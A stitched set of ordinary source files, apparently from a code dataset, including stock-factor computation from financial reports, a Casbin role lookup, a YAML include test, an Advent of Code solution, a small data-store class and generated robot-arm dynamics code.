balance_sets = engine.fetch_fundamentals_pit_extend_company_id(BalanceReport,
[BalanceReport.PARESHARRIGH,
], dates=[trade_date])
for column in columns:
if column in list(balance_sets.keys()):
balance_sets = balance_sets.drop(column, axis=1)
balance_sets = balance_sets.rename(columns={'PARESHARRIGH': 'equities_parent_company_owners', # 归属于母公司股东权益合计
})
income_sets_pre_year_1 = engine.fetch_fundamentals_pit_extend_company_id(IncomeReport,
[IncomeReport.BIZINCO, # 营业收入
IncomeReport.NETPROFIT, # 净利润
], dates=[trade_date_pre_year])
for column in columns:
if column in list(income_sets_pre_year_1.keys()):
income_sets_pre_year_1 = income_sets_pre_year_1.drop(column, axis=1)
income_sets_pre_year_1 = income_sets_pre_year_1.rename(columns={'NETPROFIT': 'net_profit_pre_year_1', # 净利润
'BIZINCO': 'operating_revenue_pre_year_1',
# 营业收入
})
income_sets_pre_year_2 = engine.fetch_fundamentals_pit_extend_company_id(IncomeReport,
[IncomeReport.BIZINCO,
IncomeReport.NETPROFIT,
], dates=[trade_date_pre_year_2])
for column in columns:
if column in list(income_sets_pre_year_2.keys()):
income_sets_pre_year_2 = income_sets_pre_year_2.drop(column, axis=1)
income_sets_pre_year_2 = income_sets_pre_year_2.rename(columns={'NETPROFIT': 'net_profit_pre_year_2', # 净利润
'BIZINCO': 'operating_revenue_pre_year_2',
# 营业收入
})
income_sets_pre_year_3 = engine.fetch_fundamentals_pit_extend_company_id(IncomeReport,
[IncomeReport.BIZINCO,
IncomeReport.NETPROFIT,
], dates=[trade_date_pre_year_3])
for column in columns:
if column in list(income_sets_pre_year_3.keys()):
income_sets_pre_year_3 = income_sets_pre_year_3.drop(column, axis=1)
income_sets_pre_year_3 = income_sets_pre_year_3.rename(columns={'NETPROFIT': 'net_profit_pre_year_3', # 净利润
'BIZINCO': 'operating_revenue_pre_year_3',
# 营业收入
})
income_sets_pre_year_4 = engine.fetch_fundamentals_pit_extend_company_id(IncomeReport,
[IncomeReport.BIZINCO,
IncomeReport.NETPROFIT,
], dates=[trade_date_pre_year_4])
for column in columns:
if column in list(income_sets_pre_year_4.keys()):
income_sets_pre_year_4 = income_sets_pre_year_4.drop(column, axis=1)
income_sets_pre_year_4 = income_sets_pre_year_4.rename(columns={'NETPROFIT': 'net_profit_pre_year_4', # 净利润
'BIZINCO': 'operating_revenue_pre_year_4',
# 营业收入
})
tp_earning = pd.merge(cash_flow_sets, income_sets, how='outer', on='security_code')
tp_earning = pd.merge(indicator_sets, tp_earning, how='outer', on='security_code')
tp_earning = pd.merge(balance_sets, tp_earning, how='outer', on='security_code')
tp_earning = pd.merge(income_sets_pre_year_1, tp_earning, how='outer', on='security_code')
tp_earning = pd.merge(income_sets_pre_year_2, tp_earning, how='outer', on='security_code')
tp_earning = pd.merge(income_sets_pre_year_3, tp_earning, how='outer', on='security_code')
tp_earning = pd.merge(income_sets_pre_year_4, tp_earning, how='outer', on='security_code')
# MRQ
balance_mrq_sets = engine.fetch_fundamentals_pit_extend_company_id(BalanceMRQ,
[BalanceMRQ.TOTASSET, # 资产总计
BalanceMRQ.PARESHARRIGH, # 归属于母公司股东权益合计
BalanceMRQ.RIGHAGGR, # 所有者权益(或股东权益)合计
BalanceMRQ.LONGBORR, # 长期借款
], dates=[trade_date])
for column in columns:
if column in list(balance_mrq_sets.keys()):
balance_mrq_sets = balance_mrq_sets.drop(column, axis=1)
balance_mrq_sets = balance_mrq_sets.rename(columns={'TOTASSET': 'total_assets_mrq',
'PARESHARRIGH': 'equities_parent_company_owners_mrq',
# 归属于母公司股东权益合计
'RIGHAGGR': 'total_owner_equities_mrq', # 所有者权益(或股东权益)合计
'LONGBORR': 'longterm_loan_mrq', # 长期借款
})
balance_mrq_sets_pre = engine.fetch_fundamentals_pit_extend_company_id(BalanceMRQ,
[BalanceMRQ.TOTASSET, # 资产总计
BalanceMRQ.RIGHAGGR, # 所有者权益(或股东权益)合计
BalanceMRQ.LONGBORR, # 长期借款
], dates=[trade_date])
for column in columns:
if column in list(balance_mrq_sets_pre.keys()):
balance_mrq_sets_pre = balance_mrq_sets_pre.drop(column, axis=1)
balance_mrq_sets_pre = balance_mrq_sets_pre.rename(columns={'TOTASSET': 'total_assets_mrq_pre',
'RIGHAGGR': 'total_owner_equities_mrq_pre',
# 所有者权益(或股东权益)合计
'LONGBORR': 'longterm_loan_mrq_pre', # 长期借款
})
# TTM Data
cash_flow_ttm_sets = engine.fetch_fundamentals_pit_extend_company_id(CashFlowTTM,
[CashFlowTTM.FINNETCFLOW,
], dates=[trade_date])
for column in columns:
if column in list(cash_flow_ttm_sets.keys()):
cash_flow_ttm_sets = cash_flow_ttm_sets.drop(column, axis=1)
cash_flow_ttm_sets = cash_flow_ttm_sets.rename(columns={'FINNETCFLOW': 'net_finance_cash_flow'})
income_ttm_sets = engine.fetch_fundamentals_pit_extend_company_id(IncomeTTM,
[IncomeTTM.BIZINCO, # 营业收入
IncomeTTM.NETPROFIT, # 净利润
IncomeTTM.MANAEXPE, # 管理费用
IncomeTTM.BIZTOTINCO, # 营业总收入
IncomeTTM.TOTPROFIT, # 利润总额
IncomeTTM.FINEXPE, # 财务费用
IncomeTTM.INTEINCO, # 利息收入
IncomeTTM.SALESEXPE, # 销售费用
IncomeTTM.BIZTOTCOST, # 营业总成本
IncomeTTM.PERPROFIT, # 营业利润
IncomeTTM.PARENETP, # 归属于母公司所有者的净利润
IncomeTTM.BIZCOST, # 营业成本
IncomeTTM.ASSOINVEPROF, # 对联营企业和合营企业的投资收益
IncomeTTM.BIZTAX, # 营业税金及附加
IncomeTTM.ASSEIMPALOSS, # 资产减值损失
], dates=[trade_date])
for column in columns:
if column in list(income_ttm_sets.keys()):
income_ttm_sets = income_ttm_sets.drop(column, axis=1)
income_ttm_sets = income_ttm_sets.rename(columns={'BIZINCO': 'operating_revenue', # 营业收入
'NETPROFIT': 'net_profit', # 净利润
'MANAEXPE': 'administration_expense', # 管理费用
'BIZTOTINCO': 'total_operating_revenue', # 营业总收入
'TOTPROFIT': 'total_profit', # 利润总额
'FINEXPE': 'financial_expense', # 财务费用
'INTEINCO': 'interest_income', # 利息收入
'SALESEXPE': 'sale_expense', # 销售费用
'BIZTOTCOST': 'total_operating_cost', # 营业总成本
'PERPROFIT': 'operating_profit', # 营业利润
'PARENETP': 'np_parent_company_owners', # 归属于母公司所有者的净利润
'BIZCOST': 'operating_cost', # 营业成本
'ASSOINVEPROF': 'invest_income_associates', # 对联营企业和合营企业的投资收益
'BIZTAX': 'operating_tax_surcharges', # 营业税金及附加
'ASSEIMPALOSS': 'asset_impairment_loss', # 资产减值损失
})
balance_ttm_sets = engine.fetch_fundamentals_pit_extend_company_id(BalanceTTM,
[BalanceTTM.TOTASSET, # 资产总计
BalanceTTM.RIGHAGGR, # 所有者权益(或股东权益)合计
BalanceTTM.PARESHARRIGH, # 归属于母公司股东权益合计
], dates=[trade_date])
for column in columns:
if column in list(balance_ttm_sets.keys()):
balance_ttm_sets = balance_ttm_sets.drop(column, axis=1)
balance_ttm_sets = balance_ttm_sets.rename(
columns={'PARESHARRIGH': 'equities_parent_company_owners', # 归属于母公司股东权益合计
'RIGHAGGR': 'total_owner_equities', # 所有者权益(或股东权益)合计
'TOTASSET': 'total_assets', # 资产总计
})
income_ttm_sets_pre_year_1 = engine.fetch_fundamentals_pit_extend_company_id(IncomeTTM,
[IncomeTTM.BIZINCO,
IncomeTTM.NETPROFIT,
], dates=[trade_date_pre_year])
for column in columns:
if column in list(income_ttm_sets_pre_year_1.keys()):
income_ttm_sets_pre_year_1 = income_ttm_sets_pre_year_1.drop(column, axis=1)
income_ttm_sets_pre_year_1 = income_ttm_sets_pre_year_1.rename(
columns={'BIZINCO': 'operating_revenue_pre_year_1', # 营业收入
'NETPROFIT': 'net_profit_pre_year_1', # 净利润
})
income_ttm_sets_pre_year_2 = engine.fetch_fundamentals_pit_extend_company_id(IncomeTTM,
[IncomeTTM.BIZINCO,
IncomeTTM.NETPROFIT,
], dates=[trade_date_pre_year_2])
for column in columns:
if column in list(income_ttm_sets_pre_year_2.keys()):
income_ttm_sets_pre_year_2 = income_ttm_sets_pre_year_2.drop(column, axis=1)
income_ttm_sets_pre_year_2 = income_ttm_sets_pre_year_2.rename(
columns={'BIZINCO': 'operating_revenue_pre_year_2', # 营业收入
'NETPROFIT': 'net_profit_pre_year_2', # 净利润
})
income_ttm_sets_pre_year_3 = engine.fetch_fundamentals_pit_extend_company_id(IncomeTTM,
[IncomeTTM.BIZINCO,
IncomeTTM.NETPROFIT,
], dates=[trade_date_pre_year_3])
for column in columns:
if column in list(income_ttm_sets_pre_year_3.keys()):
income_ttm_sets_pre_year_3 = income_ttm_sets_pre_year_3.drop(column, axis=1)
income_ttm_sets_pre_year_3 = income_ttm_sets_pre_year_3.rename(
columns={'BIZINCO': 'operating_revenue_pre_year_3', # 营业收入
'NETPROFIT': 'net_profit_pre_year_3', # 净利润
})
income_ttm_sets_pre_year_4 = engine.fetch_fundamentals_pit_extend_company_id(IncomeTTM,
[IncomeTTM.BIZINCO,
IncomeTTM.NETPROFIT,
], dates=[trade_date_pre_year_4])
for column in columns:
if column in list(income_ttm_sets_pre_year_4.keys()):
income_ttm_sets_pre_year_4 = income_ttm_sets_pre_year_4.drop(column, axis=1)
income_ttm_sets_pre_year_4 = income_ttm_sets_pre_year_4.rename(
columns={'BIZINCO': 'operating_revenue_pre_year_4', # 营业收入
'NETPROFIT': 'net_profit_pre_year_4', # 净利润
})
# indicator_ttm_sets = engine.fetch_fundamentals_pit_extend_company_id(IndicatorTTM,
# [IndicatorTTM.ROIC, # 投入资本回报率
# ], dates=[trade_date]).drop(columns, axis=1)
#
# indicator_ttm_sets = indicator_ttm_sets.rename(columns={'ROIC': '',
# })
ttm_earning = pd.merge(income_ttm_sets, balance_ttm_sets, how='outer', on='security_code')
ttm_earning = pd.merge(ttm_earning, cash_flow_ttm_sets, how='outer', on='security_code')
ttm_earning = pd.merge(ttm_earning, income_ttm_sets_pre_year_1, how='outer', on='security_code')
ttm_earning = pd.merge(ttm_earning, income_ttm_sets_pre_year_2, how='outer', on='security_code')
ttm_earning = pd.merge(ttm_earning, income_ttm_sets_pre_year_3, how='outer', on='security_code')
ttm_earning = pd.merge(ttm_earning, income_ttm_sets_pre_year_4, how='outer', on='security_code')
ttm_earning = pd.merge(ttm_earning, balance_mrq_sets, how='outer', on='security_code')
ttm_earning = pd.merge(ttm_earning, balance_mrq_sets_pre, how='outer', on='security_code')
balance_con_sets = engine.fetch_fundamentals_pit_extend_company_id(BalanceTTM,
[BalanceTTM.TOTASSET, # 资产总计
BalanceTTM.RIGHAGGR, # 所有者权益(或股东权益)合计
],
dates=[trade_date,
trade_date_pre_year,
trade_date_pre_year_2,
trade_date_pre_year_3,
trade_date_pre_year_4,
])
for column in columns:
if column in list(balance_con_sets.keys()):
balance_con_sets = balance_con_sets.drop(column, axis=1)
balance_con_sets = balance_con_sets.groupby(['security_code'])
balance_con_sets = balance_con_sets.sum()
balance_con_sets = balance_con_sets.rename(columns={'TOTASSET': 'total_assets',
'RIGHAGGR': 'total_owner_equities'})
# cash_flow_con_sets = engine.fetch_fundamentals_pit_extend_company_id(CashFlowReport,
# [CashFlowReport.FINALCASHBALA,
# ],
# dates=[trade_date,
# trade_date_pre_year,
# trade_date_pre_year_2,
# trade_date_pre_year_3,
# trade_date_pre_year_4,
# trade_date_pre_year_5,
# ]).drop(columns, axis=1)
# cash_flow_con_sets = cash_flow_con_sets.groupby(['security_code'])
# cash_flow_con_sets = cash_flow_con_sets.sum()
# cash_flow_con_sets = cash_flow_con_sets.rename(columns={'FINALCASHBALA':'cash_and_equivalents_at_end'})
income_con_sets = engine.fetch_fundamentals_pit_extend_company_id(IncomeReport,
[IncomeReport.NETPROFIT,
],
dates=[trade_date,
trade_date_pre_year,
trade_date_pre_year_2,
trade_date_pre_year_3,
trade_date_pre_year_4,
trade_date_pre_year_5,
])
for column in columns:
if column in list(income_con_sets.keys()):
income_con_sets = income_con_sets.drop(column, axis=1)
income_con_sets = income_con_sets.groupby(['security_code'])
income_con_sets = income_con_sets.sum()
income_con_sets = income_con_sets.rename(columns={'NETPROFIT': 'net_profit'}).reset_index()
ttm_earning_5y = pd.merge(balance_con_sets, income_con_sets, how='outer', on='security_code')
return tp_earning, ttm_earning, ttm_earning_5y
def process_calc_factor(self, trade_date, tp_earning, ttm_earning, ttm_earning_5y):
tp_earning = tp_earning.set_index('security_code')
ttm_earning = ttm_earning.set_index('security_code')
ttm_earning_5y = ttm_earning_5y.set_index('security_code')
earning = factor_earning.FactorEarning()
# 因子计算
earning_sets = pd.DataFrame()
earning_sets['security_code'] = tp_earning.index
earning_sets = earning_sets.set_index('security_code')
earning_sets = earning.ROA5YChg(ttm_earning_5y, earning_sets)
earning_sets = earning.ROE5Y(ttm_earning_5y, earning_sets)
earning_sets = earning.NPCutToNP(tp_earning, earning_sets)
earning_sets = earning.ROE(tp_earning, earning_sets)
earning_sets = earning.ROEAvg(tp_earning, earning_sets)
earning_sets = earning.ROEcut(tp_earning, earning_sets)
# factor_earning = earning.invest_r_associates_to_tp_latest(tp_earning, earning_sets)
earning_sets = earning.NetPft5YAvgChgTTM(ttm_earning, earning_sets)
earning_sets = earning.Sales5YChgTTM(ttm_earning, earning_sets)
# factor_earning = earning.roa(ttm_earning, earning_sets)
earning_sets = earning.AdminExpTTM(ttm_earning, earning_sets)
earning_sets = earning.BerryRtTTM(ttm_earning, earning_sets)
earning_sets = earning.CFARatioMinusROATTM(ttm_earning, earning_sets)
earning_sets = earning.SalesCostTTM(ttm_earning, earning_sets)
earning_sets = earning.EBITToTORevTTM(ttm_earning, earning_sets)
earning_sets = earning.PeridCostTTM(ttm_earning, earning_sets)
earning_sets = earning.FinExpTTM(ttm_earning, earning_sets)
earning_sets = earning.ImpLossToTOITTM(ttm_earning, earning_sets)
earning_sets = earning.OIAToOITTM(ttm_earning, earning_sets)
earning_sets = earning.ROAexTTM(ttm_earning, earning_sets)
earning_sets = earning.NetNonOToTP(ttm_earning, earning_sets)
earning_sets = earning.NetProfitRtTTM(ttm_earning, earning_sets)
earning_sets = earning.NPToTORevTTM(ttm_earning, earning_sets)
earning_sets = earning.OperExpRtTTM(ttm_earning, earning_sets)
earning_sets = earning.OptProfitRtTTM(ttm_earning, earning_sets)
# factor_earning = earning.operating_profit_to_tor(ttm_earning, earning_sets)
earning_sets = earning.ROCTTM(ttm_earning, earning_sets)
earning_sets = earning.ROTATTM(ttm_earning, earning_sets)
earning_sets = earning.ROETTM(ttm_earning, earning_sets)
earning_sets = earning.ROICTTM(ttm_earning, earning_sets)
earning_sets = earning.OwnROETTM(ttm_earning, earning_sets)
earning_sets = earning.SalesGrossMarginTTM(ttm_earning, earning_sets)
earning_sets = earning.TaxRTTM(ttm_earning, earning_sets)
earning_sets = earning.TotaProfRtTTM(ttm_earning, earning_sets)
# factor_earning = earning.invest_r_associates_to_tp_ttm(ttm_earning, earning_sets)
earning_sets = earning_sets.reset_index()
earning_sets['trade_date'] = str(trade_date)
earning_sets.replace([-np.inf, np.inf, None], np.nan, inplace=True)
return earning_sets
def local_run(self, trade_date):
print('trade_date %s' % trade_date)
tic = time.time()
tp_earning, ttm_earning, ttm_earning_5y = self.loading_data(trade_date)
print('data load time %s' % (time.time()-tic))
storage_engine = StorageEngine(self._url)
result = self.process_calc_factor(trade_date, tp_earning, ttm_earning, ttm_earning_5y)
print('cal_time %s' % (time.time() - tic))
storage_engine.update_destdb(str(self._methods[-1]['packet'].split('.')[-1]), trade_date, result)
# storage_engine.update_destdb('factor_earning', trade_date, result)
# def remote_run(self, trade_date):
# total_data = self.loading_data(trade_date)
# #存储数据
# session = str(int(time.time() * 1000000 + datetime.datetime.now().microsecond))
# cache_data.set_cache(session, 'alphax', total_data.to_json(orient='records'))
# distributed_factor.delay(session, json.dumps(self._methods), self._name)
#
# def distributed_factor(self, total_data):
# mkt_df = self.calc_factor_by_date(total_data,trade_date)
# result = self.calc_factor('alphax.alpha191','Alpha191',mkt_df,trade_date)
# @app.task
# def distributed_factor(session, trade_date, packet_sets, name):
# calc_engines = CalcEngine(name, packet_sets)
# content = cache_data.get_cache(session, factor_name)
# total_data = json_normalize(json.loads(content))
# calc_engines.distributed_factor(total_data)
#
# # @app.task()
# def factor_calculate(**kwargs):
# print("constrain_kwargs: {}".format(kwargs))
# date_index = kwargs['date_index']
# session = kwargs['session']
# factor_name = kwargs['factor_name']
# content1 = cache_data.get_cache(session + str(date_index) + "1", date_index)
# content2 = cache_data.get_cache(session + str(date_index) + "2", date_index)
# content3 = cache_data.get_cache(session + str(date_index) + "3", date_index)
# print("len_con1: %s" % len(content1))
# print("len_con2: %s" % len(content2))
# print("len_con3: %s" % len(content3))
# tp_earning = json_normalize(json.loads(str(content1, encoding='utf8')))
# ttm_earning_5y = json_normalize(json.loads(str(content2, encoding='utf8')))
# ttm_earning = json_normalize(json.loads(str(content3, encoding='utf8')))
# # cache_date.get_cache使得index的名字丢失, 所以数据需要按照下面的方式设置index
# tp_earning.set_index('security_code', inplace=True)
# ttm_earning.set_index('security_code', inplace=True)
# ttm_earning_5y.set_index('security_code', inplace=True)
# # total_earning_data = {'tp_earning': tp_earning, 'ttm_earning_5y': ttm_earning_5y, 'ttm_earning': ttm_earning}
# calculate(date_index, tp_earning, ttm_earning, ttm_earning_5y, factor_name)
| 2.3125 | 2 |
plotly/plotly/chunked_requests/__init__.py | SamLau95/plotly.py | 48 | 12762482 | <gh_stars>10-100
from . chunked_request import Stream | 1.117188 | 1 |
backend/app/crud/role.py | shizidushu/simple-report-data-table-vuetify | 13 | 12762483 | from app.mongodb_models.user import User as DBUser
from typing import Optional, List
from app.fields.user import Permission
from app.fields.role import Role
from app.core.permission import enforcer
from app import crud
def get_all_roles() -> List[Role]:
db_users = DBUser.objects()
db_users_name = [db_user.Username for db_user in db_users]
casbin_subjects = enforcer.get_all_subjects()
casbin_grouping_policy = enforcer.get_grouping_policy()
role_in_grouping_policy = [p[1] for p in casbin_grouping_policy]
roles = list(set(casbin_subjects + role_in_grouping_policy) - set(db_users_name))
all_roles = []
for role in roles:
# get user info of users belong to the role
username_of_users_for_role = enforcer.get_users_for_role(role)
users = [crud.user.get_user_base(username)
for username in username_of_users_for_role]
# get permissions of the role
role_policies = enforcer.get_filtered_policy(0, role)
permissions = [dict(zip(['sub', 'obj', 'act'], perm))
for perm in role_policies]
permissions = [Permission(**perm) for perm in permissions]
# put those together
all_roles.append(Role(name=role, users=users, permissions=permissions))
return all_roles
| 2.515625 | 3 |
tests/test_include.py | tanbro/jinjyaml | 1 | 12762484 | <gh_stars>1-10
import unittest
from contextlib import ExitStack
from os import path
from textwrap import dedent
import jinja2
import jinjyaml
import yaml
TAG = 'j2'
SEARCH_PATH = 'tests'
class IncludeTestCase(unittest.TestCase):
j2_env = None
@classmethod
def setUpClass(cls):
cls.j2_env = jinja2.Environment(
loader=jinja2.FileSystemLoader(SEARCH_PATH)
)
constructor = jinjyaml.Constructor()
yaml.add_constructor('!{}'.format(TAG), constructor)
def test_include_mapping(self):
doc = yaml.load(
dedent('''
foo: !j2 |
{% include "child-1.yml" %}
{% include "child-2.yml" %}
'''),
yaml.Loader
)
data = jinjyaml.extract(doc, env=self.j2_env)
foo = dict()
with ExitStack() as stack:
files = [
stack.enter_context(open(path.join(SEARCH_PATH, fname)))
for fname in ("child-1.yml", "child-2.yml")
]
for file in files:
foo.update(yaml.load(file, yaml.Loader))
self.assertDictEqual(data, {"foo": foo})
if __name__ == '__main__':
unittest.main()
| 2.421875 | 2 |
2020/Day02/Day02_Prob1_Valid_Passwords.py | guilhermebaos/Advent-of-Code-Solutions | 0 | 12762485 | import re
# Puzzle Input
with open('Day02_Input.txt', 'r') as puzzle_input:
passwords = puzzle_input.read().split('\n')
# Separate the input
processed_passwords = []
for pass_list in passwords:
processed_passwords += [re.split(r'[- :]', pass_list)]
# See if passwords are valid
valid = 0
for pass_list in processed_passwords:
password = <PASSWORD>[4]
if int(pass_list[0]) <= password.count(pass_list[2]) <= int(pass_list[1]):
valid += 1
print(valid)
| 3.296875 | 3 |
people.py | caustin1118/CISC204-ModellingProject | 0 | 12762486 | """A series of modules containing dictionaries that can be used in run.py"""
def test_person_set_1():
person1 = {
"name": "Steven",
"age": 12,
"likes": "action",
"availability": 3
}
person2 = {
"name": "Jane",
"age": 23,
"likes": "romance",
"availability": 2
}
person3 = {
"name": "Alice",
"age": 18,
"likes": "romance",
"availability": 2
}
person4 = {
"name": "Henry",
"age": 19,
"likes": "horror",
"availability": 1
}
person5 = {
"name": "Alex",
"age": 22,
"likes": "comedy",
"availability": 3
}
people = [person1, person2, person3, person4, person5]
return people
| 3.203125 | 3 |
src/djshop/apps/store/migrations/0003_auto_20161205_1901.py | diegojromerolopez/djshop | 0 | 12762487 | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-12-05 19:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('store', '0002_auto_20161204_2335'),
]
operations = [
migrations.AddField(
model_name='product',
name='main_image',
field=models.ImageField(default=None, null=True, upload_to=b'', verbose_name='Main image of the product'),
),
migrations.AlterField(
model_name='product',
name='categories',
field=models.ManyToManyField(related_name='products', to='store.ProductCategory', verbose_name='Product categories'),
),
]
| 1.632813 | 2 |
SimpleSpider/simple_spider/sys_func/datahub.py | snoW3heX/SimpleSpider | 5 | 12762488 | # coding:utf-8
import hashlib
import time
import math
import platform
class DataHub:
# 数据存放出
_tmpData = {}
# -1为无限制
_size_max = -1
_regID = []
'''
数据中心
临时存放数据的位置
'''
def __init__(self, size_max=0):
# 获取数据中心最大值 默认无限制
self._size_max = size_max if size_max != 0 else -1
def put(self, data):
if self._size_max != -1 and len(self._regID) >= self._size_max:
print('DataHub中已经达到最大值,无法继续添加')
return 0
# 创建ID
ID = self._createID()
# 注册添加ID
beforeLen = len(self._regID)
self._regID.append(ID)
self._regID = list(set(self._regID))
afterLen = len(self._regID)
if beforeLen == afterLen:
print('插入时间间隔太短,或者发生哈希碰撞')
return 0
# 添加数据
self._tmpData[ID] = [data]
return ID
def get(self, ID):
if ID in self._regID:
return self._tmpData[ID][0]
else:
print('没有这个ID对于的数据')
return 0
def update(self, ID, data):
if ID in self._regID:
self._tmpData[ID] = [data]
return 1
else:
print('没有这个ID对于的数据')
return 0
def dele(self, ID):
if len(self._regID) == 0:
print('DataHub中已经没有数据了')
return 0
if ID in self._regID:
self._tmpData.pop(ID)
self._regID.pop(self._regID.index(ID))
return 1
else:
print('没有这个ID对于的数据')
return 0
def _createID(self):
return hashlib.md5(
str(hashlib.md5(self._NowTime().encode('utf-8')).hexdigest() + str(time.clock()) +
platform.platform().replace('-', '').replace('.', '')).encode('utf-8')
).hexdigest()
def showAllDataItem(self):
return self._tmpData
def showDataItem(self):
return len(self._regID)
def clearAll(self):
self._tmpData.clear()
self._regID.clear()
@staticmethod
def _NowTime():
return str(time.asctime()).replace(':', '').replace(' ', '').upper()
# def main():
# DH = DataHub(size_max=1)
# i = DH.put([1, 2, 3])
# data = DH.get(i)
# print(data)
# data[0] = data[1] + data[2]
# DH.update(i, data)
# j = DH.put([5, 5, 444])
# print(DH.showDataItem())
# print(DH.showAllDataItem())
#
# DH.dele(i)
# print(DH.showDataItem())
# print(DH.showAllDataItem())
#
# DH.dele(j)
# print(DH.showDataItem())
# print(DH.showAllDataItem())
#
#
# if __name__ == '__main__':
# main() | 2.828125 | 3 |
hrl_dynamic_mpc/src/darci_left_dynamics.py | gt-ros-pkg/hrl-haptic-manip | 1 | 12762489 | <filename>hrl_dynamic_mpc/src/darci_left_dynamics.py<gh_stars>1-10
#
#
# Copyright (c) 2013, Georgia Tech Research Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Georgia Tech Research Corporation nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY GEORGIA TECH RESEARCH CORPORATION ''AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL GEORGIA TECH BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# \authors: <NAME> (Healthcare Robotics Lab, Georgia Tech.)
# \adviser: <NAME> (Healthcare Robotics Lab, Georgia Tech.)
# Generated from sympybotics library (https://github.com/cdsousa/sympybotics)
from math import sin, cos
import numpy as np
def tau( parms, q, dq, ddq ) :
#
tau_out = [0]*7
#
x0 = cos(q[1])
x1 = sin(q[2])
x2 = cos(q[2])
x3 = dq[0]*x0
x4 = -dq[1]*x1 - x2*x3
x5 = sin(q[1])
x6 = -x5
x7 = dq[0]*x6
x8 = -x7
x9 = dq[2] + x8
x10 = -x3
x11 = dq[1]*x2 + x1*x10
x12 = parms[26]*x11 + parms[28]*x4 + parms[29]*x9
x13 = parms[25]*x11 + parms[27]*x4 + parms[28]*x9
x14 = dq[1]*x3
x15 = -ddq[0]*x5 - x14
x16 = -x15
x17 = 9.81*sin(q[0])
x18 = -x17
x19 = -x18
x20 = dq[1]*x7
x21 = ddq[0]*x0 + x20
x22 = 0.03175*x14 + 0.03175*x16 + x19 + 0.27857*x20 + 0.27857*x21
x23 = x3*x7
x24 = -9.81*cos(q[0])
x25 = x24*x6
x26 = -x25
x27 = ((dq[1])*(dq[1]))
x28 = -0.27857*ddq[1] + 0.27857*x23 + x26 - 0.03175*x27 - 0.03175*((x7)*(x7))
x29 = x1*x22 + x2*x28
x30 = -x29
x31 = ddq[1]*x2 + dq[2]*x4 - x1*x21
x32 = -x24
x33 = x0*x32
x34 = -x33
x35 = 0.03175*ddq[1] + 0.03175*x23 - 0.27857*x27 - 0.27857*((x3)*(x3)) + x34
x36 = ddq[2] + x16
x37 = -ddq[1]*x1 - dq[2]*x11 - x2*x21
x38 = -x4
x39 = dq[3] + x38
x40 = sin(q[3])
x41 = cos(q[3])
x42 = x11*x41 + x40*x9
x43 = x11*x40
x44 = x41*x9
x45 = -x43 + x44
x46 = parms[36]*x42 + parms[37]*x45 + parms[38]*x39
x47 = ((x9)*(x9))
x48 = ((x4)*(x4))
x49 = -x47 - x48
x50 = -x2
x51 = x1*x28 + x22*x50
x52 = -0.00502*x49 + x51
x53 = -x37
x54 = x11*x9
x55 = x53 + x54
x56 = x35 - 0.00502*x55
x57 = x40*x56 + x41*x52
x58 = ddq[3] + x53
x59 = parms[38]*x42 + parms[40]*x45 + parms[41]*x39
x60 = -dq[3]
x61 = x31*x41 + x36*x40 + x60*(x43 - x44)
x62 = -x31
x63 = x36*x41 + x40*x62 + x42*x60
x64 = x11*x4
x65 = x36 + x64
x66 = x30 + 0.00502*x65
x67 = ddq[4] + x63
x68 = cos(q[4])
x69 = sin(q[4])
x70 = -x39*x68 - x42*x69
x71 = -x70
x72 = dq[4] + x45
x73 = -x69
x74 = x39*x73 + x42*x68
x75 = parms[48]*x74 + parms[49]*x70 + parms[50]*x72
x76 = x39*x45
x77 = x61 + x76
x78 = x66 + 0.27747*x77
x79 = -x58
x80 = x42*x45
x81 = x79 + x80
x82 = x57 + 0.27747*x81
x83 = -x68*x78 - x69*x82
x84 = dq[4]*x70 + x61*x68 + x69*x79
x85 = x68*x82 + x73*x78
x86 = -x85
x87 = parms[49]*x74 + parms[51]*x70 + parms[52]*x72
x88 = -dq[4]*x74 - x58*x68 - x61*x69
x89 = -x84
x90 = cos(q[5])
x91 = x72*x90
x92 = sin(q[5])
x93 = x74*x92
x94 = -x67
x95 = dq[5]*(-x91 + x93) + x89*x90 + x92*x94
x96 = -x88
x97 = ddq[5] + x96
x98 = dq[5] + x71
x99 = -x72*x92 - x74*x90
x100 = x91 - x93
x101 = parms[60]*x100 + parms[61]*x99 + parms[62]*x98
x102 = dq[5]*x99 + x67*x90 + x89*x92
x103 = -x83
x104 = ((x39)*(x39))
x105 = ((x42)*(x42))
x106 = -x104 - x105
x107 = -x40
x108 = x107*x52 + x41*x56
x109 = 0.27747*x106 + x108
x110 = x109*x90 + x86*x92
x111 = parms[62]*x100 + parms[64]*x99 + parms[65]*x98
x112 = sin(q[6])
x113 = x100*x112
x114 = cos(q[6])
x115 = x114*x98
x116 = -x102
x117 = -x97
x118 = dq[6]*(x113 - x115) + x112*x117 + x114*x116
x119 = -x95
x120 = ddq[6] + x119
x121 = -x103*x112 - x110*x114
x122 = -x110
x123 = x103*x114 + x112*x122
x124 = -x100*x114 - x112*x98
x125 = dq[6]*x124 + x112*x116 + x114*x97
x126 = -x113 + x115
x127 = -x99
x128 = dq[6] + x127
x129 = parms[72]*x126 + parms[73]*x124 + parms[74]*x128
x130 = parms[73]*x126 + parms[75]*x124 + parms[76]*x128
